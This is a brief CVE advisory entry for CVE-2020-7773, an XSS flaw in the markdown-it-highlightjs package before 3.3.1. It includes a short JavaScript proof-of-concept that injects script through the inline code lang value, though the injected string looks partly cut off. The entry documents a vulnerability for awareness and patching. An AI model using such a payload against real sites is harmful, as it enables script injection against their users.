cve/2020/CVE-2020-7773.md
2024-06-09 00:33:16 +00:00

1019 B

CVE-2020-7773

Description

This affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature. const markdownItHighlightjs = require("markdown-it-highlightjs"); const md = require('markdown-it'); const reuslt_xss = md() .use(markdownItHighlightjs, { inline: true }) .render('console.log(42){.">js}'); console.log(reuslt_xss);

POC

Reference

Github

No PoCs found on GitHub currently.